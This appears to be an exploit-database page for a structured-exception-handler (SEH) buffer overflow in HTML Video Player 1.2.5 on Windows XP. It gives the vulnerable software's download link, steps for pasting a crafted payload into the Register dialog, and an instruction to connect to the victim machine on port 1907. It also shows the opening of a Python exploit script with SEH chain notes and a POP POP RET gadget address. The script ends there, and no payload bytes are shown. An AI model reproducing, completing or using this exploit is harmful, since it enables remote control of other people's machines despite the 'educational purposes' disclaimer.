HTML Video Player 1.2.5 Buffer Overflow (SEH) Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2018-11-19 | Type: local | Platform: windows_x86
This exploit / vulnerability, HTML Video Player 1.2.5 buffer overflow (SEH), is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: HTML Video Player 1.2.5 - Buffer-Overflow (SEH)
# Author: Kağan Çapar
# Discovery Date: 2018-11-16
# Software Link: http://www.html5videoplayer.net/html5videoplayer-setup.exe
# Vendor Homepage : http://www.html5videoplayer.net
# Tested Version: 1.2.5
# Tested on OS: Windows XP SP3 *ENG
# Steps to Reproduce: Run the Python exploit script; it will create a new
# file with the name "exploit.txt" and copy the content to the clipboard.
# Open the software, click Help > Register, paste into "Username", and click "OK".
# Finally, connect to the victim machine on your local port "1907".
#!/usr/bin/python
import struct
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=41414141
#=> next_handler below!
#SEH chain of main thread, item 0
#Address=0012EAF4
#SE handler=336F4332 =>
#7C901931 5E POP ESI
#7C901932 5B POP EBX
#7C901933 C3 RETN